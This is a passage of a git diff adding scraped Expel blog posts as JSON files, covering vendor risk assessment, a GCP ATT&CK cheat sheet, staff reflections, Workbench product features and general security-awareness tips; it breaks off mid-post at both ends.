you may find vendors occasionally stretch the truth enough to \u201cpass.\u201d So, when you\u2019re answering the question \u201cAm I OK using this vendor,\u201d assume their answers are eighty percent correct. That\u2019s it There you go. That\u2019s Expel\u2019s third-party vendor assessment program in a nutshell. There are many like it, but this one is ours. Hopefully it gives you a jump start on building your own program. Please, take a look at our questionnaire , and feel free to use, modify, and comment on it as you see fit. I\u2019d also suggest taking a look at our NIST cybersecurity framework self-scoring tool that I created. It allows you to create charts that show your current and future security posture based on the NIST CSF and it includes a section on supply chain risk. If you do have comments and you\u2019d like to share on this process, the questionnaire or the NIST tool, please reach out to us and let us know. We\u2019re always trying to improve and would love for you to help us with that." +} \ No newline at end of file diff --git a/a-defender-s-mitre-att-ck-cheat-sheet-for-google-cloud.json b/a-defender-s-mitre-att-ck-cheat-sheet-for-google-cloud.json new file mode 100644 index 0000000000000000000000000000000000000000..f11ee53417f79ab6c1149f04c816747f9f3c3986 --- /dev/null +++ b/a-defender-s-mitre-att-ck-cheat-sheet-for-google-cloud.json @@ -0,0 +1,6 @@ +{ + "title": "A defender's MITRE ATT&CK cheat sheet for Google Cloud ...", + "url": "https://expel.com/blog/mitre-attack-cheat-sheet-for-gcp/", + "date": "Aug 5, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG A defender\u2019s MITRE ATT&CK cheat sheet for Google Cloud Platform (GCP) Security operations \u00b7 2 MIN READ \u00b7 KYLE PELLETT \u00b7 AUG 5, 2022 \u00b7 TAGS: Cloud security / MDR Our security operations center (SOC) sees its share of attackers in Google Cloud Platform (GCP). Seriously\u2014check out this recent incident report to see what we mean. Attackers commonly gain unauthorized access to a customer\u2019s cloud environment through misconfigurations and long-lived credentials\u2014100% of cloud incidents we identified in the first quarter of 2022 stemmed from this root cause. As we investigated these incidents, we noticed patterns emerge in the tactics attackers use most often in GCP. We also noticed those patterns map nicely to the MITRE ATT&CK Framework \u2026 (See where we\u2019re going with this?) Cue: our new defender\u2019s cheat sheet to MITRE ATT&CK in GCP. What\u2019s inside? In this handy guide, we mapped the GCP services where these common tactics often originate to the API calls they make to execute on these techniques, giving you a head start on protecting your own GCP environment. We also sprinkled in a few tips and tricks to help you investigate incidents in GCP. It\u2019s an easy-to-use resource that informs your organization\u2019s GCP alert triage, investigations, and incident response. Our goal? Help you identify potential attacks and quickly map them to ATT&CK tactics by providing the lessons learned and takeaways from our own investigations. Depending on which phase of an attack you\u2019re investigating, you can also use the cheat sheet to identify other potential attack paths and tactics the cyber criminal used, painting a bigger (clearer) picture of any risky activity and behaviors that can indicate compromise and require remediation. For example, if you see suspected credential access, you can investigate by checking how that identity authenticated to GCP, if they\u2019ve assumed any other roles, and if there are other suspicious API calls indicating the presence of an attacker. Other tactics that an attacker may execute prior to credential access include discovery, persistence, and privilege escalation. What\u2019s the bottom line? Chasing down GCP alerts and combing through audit logs isn\u2019t easy if you don\u2019t know what to look for (and even if you do). Full disclosure: the cheat sheet doesn\u2019t cover every API call and the associated ATT&CK tactic. But it can serve as a resource during incident response and help you tell the story (to your team and customers) after the fact. Knowing which API calls are associated with which attack tactics isn\u2019t intuitive, and we don\u2019t think you should have to go it alone. We hope this guide serves as a helpful tool as you and your team tackle GCP incident investigations. Want a defender\u2019s cheat sheet of your own? Click here to get our GCP mind map! P.S. Operating in Amazon Web Services (AWS) or Azure too? We didn\u2019t forget about you\u2014check out this AWS Mind Map and Azure Guidebook for more helpful guidance. Special thanks to Ryan Gott for his contributions to this defender\u2019s cheat sheet and mind map." +} \ No newline at end of file diff --git a/a-tough-goodbye.json b/a-tough-goodbye.json new file mode 100644 index 0000000000000000000000000000000000000000..7862b8a32e81a663da01daf4b36c371cb4b0483a --- /dev/null +++ b/a-tough-goodbye.json @@ -0,0 +1,6 @@ +{ + "title": "A tough goodbye", + "url": "https://expel.com/blog/a-tough-goodbye/", + "date": "Aug 10, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG A tough goodbye Expel insider \u00b7 2 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 10, 2021 \u00b7 TAGS: Company news After nearly five years serving as Expel\u2019s CISO (pronounced \u201cciz-oh,\u201d for those wondering), I\u2019m moving on to new adventures. But before I leave, I wanted to share a bit about my journey with Expel. Expel is an incredible company. I honestly mean that. Even from the beginning, Expel impressed me. In 2016, I had the opportunity to be the technical advisor to the Obama administration\u2019s Commission on Enhancing National Cybersecurity. It was a fascinating experience, to be sure. One of the things I heard from all the companies and agencies I interacted with was that many of them had a similar shared experience that can be best summed up like this: \u201cI\u2019ve done everything I\u2019m supposed to do and bought all the tech I\u2019m supposed to buy. I still don\u2019t feel like I see what\u2019s happening in my environment, and don\u2019t think my provider is actually finding the bad things.\u201d At the time, I remember thinking, \u201cYep, that\u2019s how it is,\u201d and I didn\u2019t have any real ideas on how to do better. How it started I got a call from Yanek, one of Expel\u2019s founders, who was on the hunt for a CISO for this new company he was helping to start and was hoping I might have some recommendations. Always happy to help a friend, I asked him what Expel was doing and told him I\u2019d see if I could find anyone who might be interested. He told me the plan for Expel: The founders wanted to disrupt the managed security space, hook into existing investments companies have made and automate not just the detection but also the investigative and recommended remediation activities. After listening to the pitch, I thought, \u201cThat\u2019s it! That\u2019s the thing nearly everyone I\u2019ve talked to in the last year needs.\u201d I offered up that I\u2019d be willing to be Expel\u2019s CISO. I interviewed with the other execs (including a really memorable one with Pete Silberman), and I ended up with the job\u2026even if we couldn\u2019t agree on how to pronounce C-I-S-O. How it\u2019s going Fast forward almost five years, and it\u2019s been a blast. Seeing the initial vision of the company come to fruition is awesome. I\u2019ve had customers tell me our service has changed their lives; that they finally get to see their kids\u2019 sporting events for the first time in forever\u2026I\u2019ve seen companies grow and build their internal security programs without having to deal with the day-to-day stress of security operations. And I\u2019ve seen Expel grow too. This company has always been an incredible place to work, a place where everyone supports each other both professionally and personally. In my role as CISO, I oversee not just security, but IT and facilities as well. I can\u2019t overstate the quality of work done by this team. We\u2019ve published some of the work we\u2019ve done (like our 3PA process , the NIST CSF self-scoring tool and NIST Privacy Framework self-scoring tool ) but there\u2019s lots of good work this team has done that the public doesn\u2019t get to see. I\u2019m thankful for them and so proud of their work. Although I\u2019m off to a new adventure and excited about the future, it\u2019s safe to say I\u2019ll miss Expel and its band of merry Expletives. Thanks and see you around To our customers: I\u2019m happy we\u2019ve been able to make a difference for you. To my coworkers, I\u2019ve enjoyed working with all of you and you\u2019ve made me a better person during my time at Expel. And to my family, thanks for your support on this adventure and the next one. I\u2019m not going far \u2014 if you want to chat about third-party risk (that\u2019s a great topic for cocktail parties, by the way) or just say hello, you can still find me in your favorite CISO Slack community, at ShmooCon and on Twitter." +} \ No newline at end of file diff --git a/a-year-in-review-an-honest-look-at-a-developer-s-first-12.json b/a-year-in-review-an-honest-look-at-a-developer-s-first-12.json new file mode 100644 index 0000000000000000000000000000000000000000..e1bbeb4ee9959db6bf405e7dd1ca03a9318114ed --- /dev/null +++ b/a-year-in-review-an-honest-look-at-a-developer-s-first-12.json @@ -0,0 +1,6 @@ +{ + "title": "A year in review: An honest look at a developer's first 12 ...", + "url": "https://expel.com/blog/developers-first-12-months-at-expel/", + "date": "Aug 16, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG A year in review: An honest look at a developer\u2019s first 12 months at Expel Talent \u00b7 8 MIN READ \u00b7 DAREN MCCULLEY \u00b7 AUG 16, 2022 \u00b7 TAGS: Careers / MDR At Expel, it should be no surprise that we value transparency. It\u2019s one of those core beliefs that makes us tick. One way we practice transparency is by providing open and candid insights into our interview and onboarding process, but what about beyond the first 90 days? Well, let\u2019s talk about it\u2014because that\u2019s what we do here. Recently, senior software engineer, Daren McCulley, used his Expel-oritory Time\u2014more on this later\u2014to reflect on his first year as a new developer at Expel. In this post, learn about Daren\u2019s experience with the interview process, major takeaways from the early days, and the personal and professional growth that came along the way. The goal? We hope that providing a peek behind the curtain will help you make the most informed decision when deciding if becoming an Expletive is right for you. Take it away, Daren! Let\u2019s start at the beginning When I think back to the interview process with Expel, what I remember most is that I was never in the dark about what was next or where I stood. In contrast to the other interviews I\u2019d been through, the process was transparent, respectful of my time, and gave me a window into Expel\u2019s culture. Our technical interviews are collaborative experiences, rather than inquisitions by whiteboard. It only took two weeks to go from my initial screen to my final interview, and my recruiter extended an offer that same evening\u2014allowing me plenty of time to compare it with offers from other companies. The thoughtfulness given to my personal circumstances\u2014understanding that I needed to weigh all of my options to make the best choice for me\u2014was the first of many times I\u2019ve witnessed Expel demonstrate another core belief: If we take care of our crew, they\u2019ll take care of our customers. At the risk of stating the obvious, I accepted my offer. What to expect in the early days At Expel, we definitely hit the ground running\u2014but don\u2019t expect to go it alone. In your first week, you can expect to commit code to production (from the comfort of your own home), but a group of people will come together to make it happen. It\u2019ll go something like this: Prior to day one, you\u2019ll get a new laptop, monitors, keyboard, trackpad, and dock in the mail. You\u2019ll also have access to some discretionary funds to make your home office sparkle. Daren\u2019s home office setup On your first day, someone from IT will guide you and other new Expletives through laptop and account setup. IT works hard to make this a fairly painless process, so things will probably work out of the box (if they don\u2019t, IT is always just a Slack message away). When joining the Engineering department, one of the first people you\u2019ll meet with over Zoom is a member of the Core Platform team to walk you through setting up your dev environment. Spoiler alert: I\u2019m a big fan of this team. They treat the rest of engineering as well as we treat our customers\u2014and they aren\u2019t alone. There are several teams at Expel whose primary mission is enabling the rest of us. Just check out this screenshot of a chat I had with one of our managers of site reliability engineering (SRE), Reilly Herrewig-Pope (hey, Reilly ), early on: Right off the bat, your manager provides a list of tasks and resources to help you get up to speed. For example, you can browse several recorded videos where subject matter experts introduce a cornerstone of Expel\u2019s tech stack\u2014which they helped design and build. Then, when you feel ready, one of your new teammates will hand-pick and shepherd you through your first issue. This is when the real fun begins\u2026 Completed Jira ticket, five days after Daren\u2019s start date TIL in year one We move fast and trust our tech At Expel, we use Gitflow for several of our primary repositories. All code is peer reviewed, checked for proper test coverage, and eventually merged into the develop branch\u2014kicking off continuous integration and continuous delivery (CI/CD) and ending in a deployment to our staging environment. We cut and merge a new tagged release every day from develop to main, which deploys the latest code to production. These daily releases require trust in the process and infrastructure to catch and handle human errors. I learned this lesson early on. On my third day, I pushed a bad database (DB) migration that would\u2019ve broken our staging environment. Not only did the automated migration process catch the error and rollback the transaction protecting the DB, but when the first Kubernetes pod failed to run the migration, the existing pods stayed live and didn\u2019t deploy the broken image. Staging kept working as expected for everyone depending on it, while I chased down and patched my bug. It was a huge relief to know that I had a safety net I didn\u2019t have earlier in my career because Expel invested in resilient infrastructure. Having a talented group of SREs designing, building, and maintaining a system that protects us from ourselves is only one part of what makes our daily release cycle work. Every feature team at Expel has a dedicated quality assurance (QA) engineer who considers each issue that needs testing carefully. I pride myself on attention to detail, but, more often than not, our QA still finds edge cases I didn\u2019t consider. That\u2019s because their involvement begins long before I merge code and mark an issue as pending acceptance. Our QAs take part in backlog grooming, where they help define testable acceptance criteria and ask questions. This pushes us to confront the devil in the details with all stakeholders present, so that we don\u2019t waste time writing code based on incorrect assumptions. We\u2019re still a startup If you want to maintain legacy Java code, or push pixels and patch bugs for a PHP application in LTS, this gig might not be for you. Similarly, if you like being a Software Engineer II and knowing that, if you meet your commit quota, you\u2019ll be eligible for Software Engineer III in two years\u2014this probably isn\u2019t for you. Even though Expel is no longer a handful of people in a barn with a dream and a whiteboard, it still feels scrappy out of necessity. Our chips are on the table behind two very ambitious bets that require constant evolution and development: We integrate with damn near anything, and We empower humans with the data to make sound judgements, and automate the rest. These bets are what keep things interesting, and demand creative problem solving from our engineers. We have swimlanes but don\u2019t operate in silos To build complex systems, software engineers rely on abstraction to hide complexity behind well-defined interfaces. There\u2019s a parallel to this in how our teams are structured at Expel. As an application developer, I don\u2019t bear the principal responsibility for designing user interfaces (UIs), setting sprint priorities, or managing infrastructure. Instead Expel offers me a seat at the table, where I can collaborate with designers, product managers, and SREs to build software that solves the highest-priority problems in a way that\u2019s scalable. Through these relationships, I\u2019ve grown my skills in all of these disciplines and, more importantly, my ability to effectively communicate with people in these roles. We run towards the fire We have a Slack channel called \u201cgotime.\u201d This is where high-visibility incidents are first reported before they\u2019re spun-off into dedicated channels and Zooms. One of the most remarkable affirmations of Expel\u2019s culture is the number of people that join the fight immediately following one of these incidents\u2014regardless of who is responsible or who owns the code. Our support of one another extends beyond incidents. Whenever I need help, I always find someone willing to lend a hand. There\u2019s a lot to like about Expel, but the people I have the privilege to work with will always be at the top of that list for me. Opportunities for personal growth In addition to the growth we experience on the day-to-day (that\u2019s the nature of the job), Expel encourages us to attend one conference per year and provides a budget of $2,500 to make that happen. This year, I flew out to San Jose for a Postgres conference. I was honestly surprised by how simple it was to get the trip approved, book travel, and submit expenses. Not to mention, we have access to tools like Pluralsight for curated online training. But access to material isn\u2019t enough. You also need time and space to invest in continued education. My team let me spend an entire sprint building a foundation in one of the JavaScript (JS) frameworks we use, so that I could approach future issues with more experience and confidence. FYI: we write the majority of our applications in Go, JS, or Python, which gives you the opportunity to become (or remain) proficient in three in-demand languages. Every quarter, we set aside two days called Expel-oritory Time (remember this from the intro?), where the entire product organization can work on whatever they want. Folks often elect to form small, cross-team groups to hack away on some experimental feature, explore our data in a new and interesting way, or use the time to write a blog post\u2014like this one. (Side bar: while I can\u2019t yet speak from experience, we also have a 12-month BUILD program for managers, designed to give you practical skills through ongoing learning and practice.) \u2026and professional growth Like I\u2019ve said, transparency is foundational at Expel. Information normally held close to the chest at other companies, like compensation or the state of the business, is shared openly. That principle applies to our workplace relationships as well. I have candid 1-on-1s with my manager every week where we discuss how things are going, any obstacles she can help me overcome, and what the next steps are for my journey at Expel and beyond. She\u2019s transparent about my performance, and we chat openly about challenges I\u2019m facing and what I should focus on to reach the next milestone in my career. From day one, I\u2019ve had someone in my corner considering my individual circumstances, who never made me feel like a replaceable cog in a corporate machine. We\u2019re building a product that meets customers where they are in their security journey, which means we need people with different points of view at the table. It\u2019s part of the reason equity, inclusion, and diversity are hugely important at Expel\u2014it\u2019s another one of those core beliefs: \u201cbetter when different.\u201d We\u2019re a stronger organization when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. We also have four employee engagement groups (ERGs) to support that: BOLD (for Black employees), WE (for the women of Expel), The Treehouse (for LGBTQ+ employees), and The Connection (for mental wellbeing)\u2014all of which are open (and welcoming) to allies. We\u2019ve added more than 180 new Expletives since I started, and there are a whole lot of open positions and opportunities for career advancement (BTW, we\u2019re hiring ). You won\u2019t be pigeonholed here. The opportunity to apply for new roles arises often, giving you a chance to find your perfect fit or try something new. Looking back (and ahead)\u2026 I knew from the interview process that Expel was the right choice for me\u2014and my confidence in that choice has only grown over my first year. Most professions require some amount of continued education, but the pace of change in software engineering takes this requirement up a notch. Working for a company that understands the value of investing in their workforce, and that provides the necessary space and time to experiment, truly supports my personal and professional growth. Every job comes with a unique set of challenges and Expel has no shortage of hard problems. The difference\u2014and the reason I\u2019m looking forward to year two\u2014are the people I get to face down those challenges with. If I\u2019ve sold you on Expel, or you think it\u2019s too good to be true and want to ask some questions, check out our open jobs . If you\u2019re anything like me, you won\u2019t be disappointed." +} \ No newline at end of file diff --git a/add-context-to-supercharge-your-security-decisions-in.json b/add-context-to-supercharge-your-security-decisions-in.json new file mode 100644 index 0000000000000000000000000000000000000000..2d815be43e18ef0ac3b1102d7fdbc93f2432d665 --- /dev/null +++ b/add-context-to-supercharge-your-security-decisions-in.json @@ -0,0 +1,6 @@ +{ + "title": "Add context to supercharge your security decisions in ...", + "url": "https://expel.com/blog/add-context-to-supercharge-your-security-decisions-in-expel-workbench/", + "date": "5 days ago", + "contents": "Subscribe \u00d7 EXPEL BLOG Add context to supercharge your security decisions in Expel Workbench Security operations \u00b7 2 MIN READ \u00b7 PATRICK DUFFY \u00b7 MAY 12, 2023 \u00b7 TAGS: Cloud security / MDR / Tech tools Defenders need so much information to make good security decisions in the security operations center (SOC). Situations constantly evolve\u2014employees join and leave the org, new technology gets onboarded, unexpected risks surface, and so much more\u2014it\u2019s hard for the SOC to keep up with ever-changing conditions throughout the organization. The good news is that all of these changes create contextual information that Expel and our customers use to make smart decisions. The more we know about your environment and your users, the easier it is for our software\u2014and by extension our SOC analysts\u2014to determine which events require remediation. With this in mind, we\u2019ve introduced a new capability which allows you to add business context to Expel Workbench\u2122 that helps our SOC team reduce the time-to-decision on alerts and relieve the burden on your team. Adding context to Workbench Here\u2019s how it works: On the \u201cContext\u201d page in Workbench, users can add new context and see all existing context that has been previously added by your organization or our SOC team. Think of context as information about a user or situation that\u2019s helpful to know when making a decision about a security alert. It\u2019s like a virtual sticky note with directions like: Every time you see user X, be aware that they often travel outside the country. This gives Expel important information about the user\u2019s location that could help quickly resolve alerts generated about logins from different countries when traveling. On this page, you can edit context, add descriptions and notes, change users and more. You can also see a history of who created the context, who updated it, and when, and you can create categories to quickly group and find types of context being added in Workbench. You can also upload lists of context, like IP addresses or emails that belong to specific groups. Highlight essential information Once added, you can highlight this context in Workbench to call attention to important pieces of information. This serves as a digital sticky note for analysts to share information and learnings about an environment. For example, if we know that specific prefixes are used for admin hosts, we can add context calling out that host is an admin to provide situational awareness so analysts can make the right call on whether and how to act on an alert. This is visible to Expel SOC analysts and customers, meaning you have insight into how analysts work alerts, investigations, and incidents. More valuable ways to add context Context allows you to easily make updates as employees leave the organization or change roles. For example, you can add context for the CEO\u2019s email address along with specific intel into Workbench, knowing that CEOs are often targets of phishing attacks. If the CEO leaves the org, you can update or remove the email address and all the associated detections and workflows update automatically. Another way to use context is to make note that specific indicators of compromise (IOC) have been linked to a threat actor within the environment. For example, the SOC can take note that the auto host containment remediation action needs to be taken immediately if a specific IOC is seen as alert. For example, if they see the domain faceb00k.com using zeroes instead of O\u2019s. Making Expel work for you Context is just one more way to customize Expel to your specific environment. Be sure to check out the Context page under Organizational Settings to see what context you already have in place and consider additions that would be helpful." +} \ No newline at end of file diff --git a/an-easier-way-to-navigate-our-security-operations-platform.json b/an-easier-way-to-navigate-our-security-operations-platform.json new file mode 100644 index 0000000000000000000000000000000000000000..ddc06c01f146d816a56d92a2a02326fb3fb9dc9e --- /dev/null +++ b/an-easier-way-to-navigate-our-security-operations-platform.json @@ -0,0 +1,6 @@ +{ + "title": "An easier way to navigate our security operations platform ...", + "url": "https://expel.com/blog/an-easier-way-to-navigate-our-security-operations-platform-expel-workbench/", + "date": "Apr 4, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG An easier way to navigate our security operations platform, Expel Workbench Security operations \u00b7 4 MIN READ \u00b7 KIM BIELER \u00b7 APR 4, 2023 \u00b7 TAGS: MDR / Tech tools When it comes to security operations, speed and ease-of-use are critical for making the best decisions and judgments quickly. It\u2019s important that analysts see what they need to see, and can get to the information they need as intuitively as possible. That\u2019s why we\u2019re excited to announce upgrades to the navigation within our security operations platform, Expel Workbench\u2122. Our offerings and capabilities have evolved as the security needs of our customers have grown, so we redesigned the navigation to make it even easier for our clients to manage security operations. The new design makes navigation within Workbench even more flexible, easy-to-use, and downright good looking. And the kicker is that these changes were all driven by you\u2014our customers. Let\u2019s take a look at what\u2019s new. Sidebar navigation The most noticeable change is that we shifted the horizontal navigation to the sidebar. This gives us more room for the essential tools we offer today and the capabilities we plan to build in the future, and makes it easier for you to get to the tools you need, fast. Alert ticker You\u2019ll also notice we\u2019ve moved the alert ticker to the top of the interface, which makes it easier to see the most essential information first. The alert ticker links directly to all critical, high, medium, low, and tuning alerts, and is ever-present throughout Workbench for easy access. Custom detection rules We moved the Custom Detection Rules view from our Settings page to our Detections page. This improvement helps you better understand what will raise Expel alerts in your environment, in addition to any custom lookout, add-to investigation, and noisy alert suppressions created. New location for Actions One of the most important questions our customers ask when working with Expel\u2019s security operations center (SOC) during an investigation or incident is, \u201cWhat\u2019s on our team\u2019s plate?\u201d We\u2019ve made it simple to get to that to-do list by moving our Actions page to the top of our information architecture in the navigation. With one click, you now see all outstanding to-do items for the team, Expel\u2019s SOC, or our bots, for any investigation or incident. Breadcrumbs Sometimes you go down a rabbit hole, checking out all the awesome work done during an investigation or incident\u2014we get it. We\u2019ve introduced breadcrumbs at the top of each page to make it simple to jump back to the starting point of your journey through Workbench. Why we made these changes We continuously ask ourselves: how can we make our users\u2019 jobs easier and their experience in the product more intuitive? We spoke to customers, collected feedback and discovered new ways to simplify how clients use the product today and provide flexibility for how the product will expand in the future. Our mission with the new navigation design therefore centered around four goals: Use navigation space more efficiently and provide room to grow. Create a high-level information architecture that makes even more sense. Reduce clicks to the important and frequently used parts of the platform. Align Workbench with the brand palette and iconography. Since we launched, we\u2019ve scaled Workbench significantly to keep up with ever-evolving security needs. We\u2019ve added half a dozen dashboards; entire new offerings like threat hunting , phishing , and managed detection and response (MDR) support for Kubernetes ; and tools like context, configurable notifications, and the NIST CSF. The original horizontal navigation could no longer expand to accommodate existing features, never mind the accelerating pace of enhancements and new offerings we knew were coming soon. We wanted to make ground-breaking features like the detections strategy UI and additional offerings like hunting easier to find and use. When customers have a consistently good experience across touchpoints, that creates a sense of assurance and trust\u2014which is especially critical in security, when customers are trusting us to keep their organization safe. That\u2019s why the colors and icons you see on the website now carry through to our Workbench platform. How this helps you We hope that the new navigation makes your work easier and faster. We know that this is an essential tool you use every day\u2014so making it even more enjoyable to use will improve your workflow and help keep your organization safe. Here are a few specific details we think you\u2019ll appreciate: The features are there when you need it, and out of the way when you don\u2019t. You can get where you want to go with fewer clicks. It\u2019s easier to see how the platform is structured and where you are in that structure. More of the features are visible and discoverable. A glimpse into the design process To ensure our new Workbench navigation design aligns with your needs, we followed the proven user experience process of research, iteration, testing, and change management. Research: We had a lot of hunches and opinions about what needed to change, but we weren\u2019t designing for ourselves. So early on we conducted a card-sorting exercise with our customers, asking them to sort the features and categorize them. This research helped us understand what needed to be visible in the main navigation versus what could be listed in the secondary navigation. Iteration: There\u2019s never one right way to solve a design problem. The team experimented with different layouts, colors, icon choices, and organizational schemes. Testing: A key concern for the redesign was how it would affect analyst efficiency. We\u2019re proud of our response times, and if the new navigation slowed analysts down by even a second per alert, that could meaningfully affect our service level objectives (SLOs), which was out of the question. So we did a staggered release to the SOC and had analysts kick the tires for several weeks while we watched efficiency metrics. Change management: A project like this doesn\u2019t get designed, built, and released overnight. It\u2019s a change management effort that involved months of communication, resourcing and planning discussions with engineering, and the creation of a tiger team to execute the design and plan the roll-out. Check it out If you haven\u2019t logged into Workbench since this update, I encourage you to jump in and explore." +} \ No newline at end of file diff --git a/an-expel-guide-to-cybersecurity-awareness-month-2022.json b/an-expel-guide-to-cybersecurity-awareness-month-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..c63f1a51204564b4ce4ba9ce1b5d06f613b9c9de --- /dev/null +++ b/an-expel-guide-to-cybersecurity-awareness-month-2022.json @@ -0,0 +1,6 @@ +{ + "title": "An Expel guide to Cybersecurity Awareness Month 2022", + "url": "https://expel.com/blog/expel-guide-to-cybersecurity-awareness-month-2022/", + "date": "Oct 4, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG An Expel guide to Cybersecurity Awareness Month 2022 Tips \u00b7 5 MIN READ \u00b7 GREG NOTCH \u00b7 OCT 4, 2022 \u00b7 TAGS: MDR Fall is in the air, which can only mean one thing: Cybersecurity Awareness Month is here. Every year, the National Cybersecurity Alliance (NCA) and the Cybersecurity and Infrastructure Security Agency (CISA) use October to share information and important resources to help people stay safer and more secure online. It\u2019s a favorite for us at Expel because it\u2019s about education and awareness at a time that isn\u2019t a reaction to the cyber-threat or attack du jour. Instead, we can take a step back to share information and resources within the defender community and anyone with an online presence\u2014which, let\u2019s face it, is just about everyone. Expel is also a proud Champion of Cybersecurity Awareness Month 2022 \u2014a collaborative effort among businesses, government agencies, colleges and universities, associations, nonprofit organizations, and individuals committed to improving online safety and security for all. This year, the CISA and NCA are promoting four key security behaviors to help equip everyone, from consumers to corporations, to better protect their data. To support this initiative, we\u2019ve curated some Expel resources to help your organization improve its cybersecurity posture\u2014this month, and beyond. 1. ICYMI: always enable multi-factor authentication (MFA), but also have a back-up plan. At this point, enabling MFA (when available) should be a no-brainer. But, we also know that MFA isn\u2019t always a silver bullet for protecting your environment. Our security operations center (SOC) has seen examples of this in the wild. We\u2019ve responded to phishing attacks that used a man-in-the-middle tactic to send users to a fake Okta login page. (Check out how it went down here .) We\u2019ve also seen attackers use BasicAuthentication to bypass MFA and target access to human capital management systems . Based on these novel incidents, here are a few lessons learned you can apply to your own organization: Deploy phish-resistant MFA wherever possible. If FIDO-only factors for MFA are unrealistic, disable email, SMS, voice, and time-based, one-time passwords (TOTPs). Instead, opt for push notifications. Then configure MFA or identity provider policies to restrict access to managed devices as an added layer of security. (More on this in our Quarterly Threat Report for Q2 2022 .) Enforce MFA prompts when users connect to any sensitive apps via app-level MFA. Don\u2019t let your sensitive apps (think: Okta, Workday, etc.) be a one-stop shop for attackers. To take it a step further, tell your users to always review the source of the MFA request (if via push notification) to verify the login isn\u2019t from an unusual area\u2014and if it is, encourage your people to report strange requests. Finally, be wary of brute force MFA requests, which involve an attacker continuously sending push notifications to the victim until they accept. Let your users know this is something to watch out for. 2. Don\u2019t rely on your memory or Sticky Notes to keep track of all your passwords. This year, a global survey conducted by open-source password manager, Bitwarden, revealed that 55% of people rely on their memory to manage passwords . Of those surveyed, only 32% of Americans were required to use a password manager at work. We know that memory can be fickle at best. Password managers are a great way to keep organized for anyone creating multiple (if not dozens) of usernames and passwords to do their job, but they can be difficult for your IT team to enforce. Instead, many businesses opt for a single sign-on (SSO) solution to allow employees to sign into an approved account one time for access to all connected apps. However, easy access for users also makes SSO services a popular target for attackers\u2014it\u2019s part of the reason business application compromise (BAC) attacks are evolving . Regardless, it\u2019s never a bad idea to encourage employees to create strong, unique passwords for different sites/apps, and of course\u2014we can\u2019t say this one enough\u2014enable MFA whenever possible. Want to be able to forget your passwords? Installing a password manager will help generate strong passwords, keep your accounts safer, and save you from memorizing countless strings of characters. Plus, it makes it easier to deal with constantly changing passwords for sites whose accounts have been compromised. BTW, we\u2019ve compiled more tips for maintaining security and privacy at home for remote workers (because, let\u2019s face it, that\u2019s most of us these days), as well as effective ways to encourage more secure behaviors . 3. Stop ignoring that \u201csoftware updates available\u201d notification. For security professionals, this might sound like an obvious one, but patching and updating software regularly can help prevent attacks. Vendors are constantly plugging security holes and patching bugs, some of which might represent entry points for attackers. A lot of operating systems and app stores will do this for you automatically, but keep an eye on those notifications prompting an update\u2014pushing it off might be convenient now, but cost you down the line. Updates to web browsers are particularly important, so try to install those right away. So how do you ensure your team keeps up with these updates? Try a combination of gamification and education. Entering employees into raffles for gift cards or other perks for applying OS updates is a generally inexpensive way to reduce risk for your organization and keep folks happy. (FYI: more tips like this from industry leaders grappling with similar challenges from Forbes , including this same sage advice from our own co-founder and CEO, Dave Merkel.) 4. Help your organization avoid taking the bait on a costly phishing scam. Recognizing and reporting phishing schemes is one of the first lines of defense when it comes to protecting your organization. We\u2019ve seen this in our SOC on countless occasions, from attackers targeting Amazon Web Services (AWS) login credentials , to malware-poisoned resum\u00e9s aimed at job recruiters \u2014and everything in between. We\u2019ve also seen how these campaigns can reveal larger, more malicious business email compromise (BEC) attacks if they aren\u2019t stopped in their tracks (get the full rundown on that incident here ). Fortunately (or not), Expel\u2019s Phishing team reviews hundreds of emails a day and thousands of emails weekly, so we\u2019ve picked up a few things about how to protect your organization, including: Prevention starts with proper training. Make sure employees learn to recognize potential red flags associated with phishing emails when they land in their inbox. Even if this means an investment on your part, it\u2019ll pay dividends in the long run. Spend time on education for specific business units on the phishing campaigns that might target them. Finance teams might encounter financial-themed campaigns with subject lines, such as \u201cURGENT:INVOICES,\u201d while recruiters may see resum\u00e9-themed lures. Once they know what to look for, make it easy for people to report suspicious activity. An effective way to do this is through a system for employees to validate suspicious emails or texts. This allows IT to provide guidance to the individual, and gives security team members enough insight to identify trends to sniff out a larger scale attack early on. (More on preventing these scams like this here .) We know. There\u2019s a lot to unpack here, and there\u2019s probably more we didn\u2019t include for the sake of space and your sanity. But hopefully these resources provide a glimpse into some of the ways you can help your organization toward an overall better security posture\u2014even after October. We\u2019re just getting started for Cybersecurity Awareness Month. Check out our #BeCyberSmart resources for curated content to follow along." +} \ No newline at end of file diff --git a/an-inside-look-at-what-happened-when-i-finally-took.json b/an-inside-look-at-what-happened-when-i-finally-took.json new file mode 100644 index 0000000000000000000000000000000000000000..f8da24bb5bf0e3e0ea60b9eb2d0da21f981e7601 --- /dev/null +++ b/an-inside-look-at-what-happened-when-i-finally-took.json @@ -0,0 +1,6 @@ +{ + "title": "An inside look at what happened when I finally took ...", + "url": "https://expel.com/blog/inside-look-what-happened-finally-took-vacation/", + "date": "Aug 6, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG An inside look at what happened when I finally took a vacation (for realsies) Talent \u00b7 5 MIN READ \u00b7 AMY ROSSI \u00b7 AUG 6, 2019 \u00b7 TAGS: Career / Employee retention / Great place to work / Management I\u2019ve got a confession: I\u2019m terrible at relaxing. In fact, one of my college entrance essays centered around the fact that I have a hard time sitting still. And I once had a roommate look at me and ask, \u201cDo you ever just sit down and do nothing?!\u201d Sure, sometimes I sit to watch Netflix and Hulu, but I\u2019m usually folding clothes or thinking about next week\u2019s carpool schedule for my kids at the same time. Let\u2019s just say I\u2019m grateful I discovered the many benefits of yoga years ago. But this blog post isn\u2019t about my struggle with knowing how and when to slow down . It\u2019s about what happened when I finally took a real vacation \u2014 one that involved me and my family with zero cell phone or internet services for a whole seven days. Our view on vacays At Expel, we believe in the importance of taking vacation. It\u2019s so important to us that we\u2019ve included it in our Palimpsest (no, we didn\u2019t make up a word ) \u2014 it\u2019s a document our executive team developed together, and it outlines what we value about our culture and describes the way we want to work with each other. Among many other attributes we value here, our Palimpsest makes it clear that all employees should feel not just comfortable but encouraged to take the vacation time they need. But here\u2019s the thing: Words are just words 